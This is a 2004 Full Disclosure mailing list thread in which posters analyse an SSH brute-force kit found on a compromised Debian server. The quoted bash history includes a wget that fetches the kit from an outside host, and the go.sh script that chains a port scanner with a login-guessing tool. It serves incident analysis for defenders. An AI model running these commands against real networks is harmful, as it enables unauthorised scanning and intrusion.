Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Re: Automated SSH login attempts?
From: Ron DuFresne <dufresne () winternet com>
Date: Thu, 29 Jul 2004 16:01:51 -0500 (CDT)


This all looks very similair to the couple year old ssh1 hack, I recall
some of these same files and binaries I think from that old hack, but,
this looks like someone took an old hack and tried to rework it as a brute
forcer for poorly setup systems.

Thanks,

Ron DuFresne


On Thu, 29 Jul 2004, Andrei Galca-Vasiliu wrote:

By the way, you have to be root to use "ss":

sweet () andrei:~/ssh$ ./go.sh 82.77.45
scanning network 82.77.*.*
usec: 30000, burst packets 50
using inteface eth0
ERROR: UID != 0


Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek
povestea:
Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

Whoever broke into the machine did not take any attempts to cover up his
tracks - this is what I found in /root/.bash_history:

------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
------

um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:

go.sh:
-------
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./sshf
-------

* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).

This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?

The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.

cheers,
Stefan






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro


Security is an illusion...

*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]